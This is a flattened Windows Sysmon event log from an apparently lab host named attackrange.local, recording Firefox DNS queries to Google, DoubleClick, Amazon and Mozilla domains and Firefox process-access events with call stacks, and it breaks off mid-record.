22542200x800000000000000017329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.272{59A5CD1D-945A-6005-3305-00000000A301}7052taz.de02001:67c:13c::7a2:de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.213{59A5CD1D-945A-6005-3305-00000000A301}7052googleads.g.doubleclick.net0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.186{59A5CD1D-945A-6005-3305-00000000A301}7052play.google.com02a00:1450:4001:81d::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.185{59A5CD1D-945A-6005-3305-00000000A301}7052play.google.com0172.217.22.110;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.184{59A5CD1D-945A-6005-3305-00000000A301}7052play.google.com0::ffff:172.217.22.110;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.182{59A5CD1D-945A-6005-3305-00000000A301}7052adservice.google.de0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.141{59A5CD1D-945A-6005-3305-00000000A301}7052pagead46.l.doubleclick.net02a00:1450:4001:818::2002;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.134{59A5CD1D-945A-6005-3305-00000000A301}7052pagead46.l.doubleclick.net0172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.133{59A5CD1D-945A-6005-3305-00000000A301}7052adservice.google.com0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.116{59A5CD1D-945A-6005-3305-00000000A301}7052www3.l.google.com02a00:1450:4001:818::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.107{59A5CD1D-945A-6005-3305-00000000A301}7052www3.l.google.com0172.217.21.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.106{59A5CD1D-945A-6005-3305-00000000A301}7052ogs.google.com0type: 5 www3.l.google.com;::ffff:172.217.21.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:10.634{59A5CD1D-8E56-6005-2E00-00000000A301}2464110.22.217.172.in-addr.arpa.0type: 12 fra15s18-in-f110.1e100.net;type: 12 fra15s18-in-f14.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.603{59A5CD1D-8E56-6005-2E00-00000000A301}2464142.212.58.216.in-addr.arpa.0type: 12 fra16s46-in-f14.1e100.net;type: 12 ams15s21-in-f142.1e100.net;type: 12 ams15s21-in-f14.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.603{59A5CD1D-8E56-6005-2E00-00000000A301}2464195.74.250.142.in-addr.arpa.0type: 12 fra24s02-in-f3.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.603{59A5CD1D-8E56-6005-2E00-00000000A301}2464163.212.58.216.in-addr.arpa.0type: 12 ams15s22-in-f3.1e100.net;type: 12 fra24s01-in-f3.1e100.net;type: 12 ams15s22-in-f163.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:09.603{59A5CD1D-8E56-6005-2E00-00000000A301}2464131.16.217.172.in-addr.arpa.0type: 12 zrh04s06-in-f131.1e100.net;type: 12 fra15s46-in-f3.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000017388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.723{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.648{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.647{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.614{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.614{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.567{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.567{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.567{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.567{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.077{59A5CD1D-945A-6005-3305-00000000A301}7052images-eu.ssl-images-amazon.com0type: 5 m.media-amazon.com;type: 5 f.media-amazon.com;type: 5 media.amazon.map.fastly.net;::ffff:151.101.13.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:12.950{59A5CD1D-945A-6005-3305-00000000A301}7052prod.topsites.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:12.937{59A5CD1D-945A-6005-3305-00000000A301}7052prod.topsites.prod.cloudops.mozgcp.net034.120.99.97;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:12.937{59A5CD1D-945A-6005-3305-00000000A301}7052topsites.services.mozilla.com0type: 5 prod.topsites.prod.cloudops.mozgcp.net;::ffff:34.120.99.97;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:10.635{59A5CD1D-8E56-6005-2E00-00000000A301}2464238.21.217.172.in-addr.arpa.0type: 12 fra16s13-in-f14.1e100.net;type: 12 fra16s13-in-f238.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000017371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.223{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.223{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.004{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.004{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.004{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.004{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.582{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla 